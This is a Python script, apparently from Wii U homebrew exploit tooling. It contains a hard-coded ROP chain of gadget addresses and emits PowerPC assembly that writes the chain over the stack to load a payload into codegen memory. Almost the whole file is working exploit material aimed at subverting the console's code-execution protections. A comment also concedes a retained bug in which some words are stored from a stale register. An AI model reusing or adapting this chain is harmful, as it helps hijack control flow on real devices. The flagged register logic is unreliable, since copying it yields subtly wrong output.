# Assemble the ROP chain into semi-optimized PPC that writes it over the stack.
# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen.
# FFFF2222 is a stand-in for the payload load address (stored in r7).
# FFFF3333 is a stand-in for the payload size (stored in r11).
# Place the output at "found:" in codeloader.s.
# This ROP chain was created using:
#   ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
#   ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']

# Distinct 32-bit words in order of first appearance.  Each one is loaded into
# a register once and then stored to every stack slot that holds it, instead of
# re-materialising the same constant for every slot.
seenWords = set()
ropChainAddresses = []
for word in ropChain:
    if word in seenWords:
        continue
    seenWords.add(word)
    ropChainAddresses.append(word)

# Register holding the current word.  The two placeholders select r7/r11, and a
# word whose upper half is zero selects r10 after a single 'li'.  The 'lis'/'ori'
# branch does not reassign it, so such a word is stored from whatever register
# the preceding entry selected (behaviour kept exactly as in the original).
writeRegister = ''
for address in ropChainAddresses:
    upper, lower = address[:4], address[4:]
    if address == 'FFFF2222':
        writeRegister = 'r7'
    elif address == 'FFFF3333':
        writeRegister = 'r11'
    elif upper == '0000':
        print('li r10, 0x' + lower)
        writeRegister = 'r10'
    else:
        print('lis r10, 0x' + upper)
        if lower != "0000":
            print('ori r10, r10, 0x' + lower)
    # One store per occurrence; the stack offset is the word's index times 4.
    for slot, word in enumerate(ropChain):
        if word == address:
            print('stw {}, 0x{:X}(r1)'.format(writeRegister, slot * 4))